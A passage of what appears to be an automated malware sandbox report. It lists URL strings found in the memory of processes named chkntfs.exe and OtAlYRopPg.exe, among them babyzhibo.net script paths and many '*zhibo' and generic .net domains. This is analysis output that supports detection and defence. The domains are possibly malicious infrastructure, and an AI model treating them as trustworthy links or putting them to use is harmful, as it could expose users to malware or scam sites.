                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/common.fe363a40.js
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/footer.fe363a40.js
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/footerbar.fe363a40.js
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/header.fe363a40.js
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/index.umd.js
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/js.js
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/nc.js
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/pcmodule.fe363a40.js
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/pullup.js
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/realNameAuth.js
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/replyItem.fe363a40.js
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/tracker.fe363a40.js
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/picture/anva-zilv.png
                Source: OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/picture/default_avatar.jpg
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/picture/qr-4_httpswww.wandoujia.comqr.png
                Source: OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/picture/qr-5_httpswww.wandoujia.comqr.png
                Source: OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/wn9b/
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.banditi.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=172798911753
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.biomedika.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bodyonline.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bodyonline.net/binding
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.brainathlete.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.caoliuzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chuaizhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chuncaozhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chunxinzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cyberpolice.cn
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.dajingzhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.easervices.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.easygram.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.elecsa.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.elecsa.net/binding
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.electrocat.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.eurosupport.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.eventsmedia.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.flexsource.net/binding
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.flyingwhale.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.fornecedor.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.gotogermany.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.guanmengzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hairdeluxe.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.haituzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.happystories.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hiload.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.huayuzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.huoyazhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.implantcentre.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.implantcentre.net/binding
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.innovativemind.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jiuyuezhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.kleenair.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.larep.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.legalstrategy.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.legalvideos.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lesezhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lianaizhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.liangmeizhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.liguizhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.linguarama.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lingyangzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.liufangzhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.liuhuazhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.losbravos.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lovemarketing.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lovevintage.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.luolizhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.luxbrand.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.maituzhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.manchengzhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.manchengzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.maskmakers.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.masterfloors.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mediaccess.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.medicalink.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.megaos.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.meijiuzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.methlab.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.miaozhaozhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.moyouzhibo.net
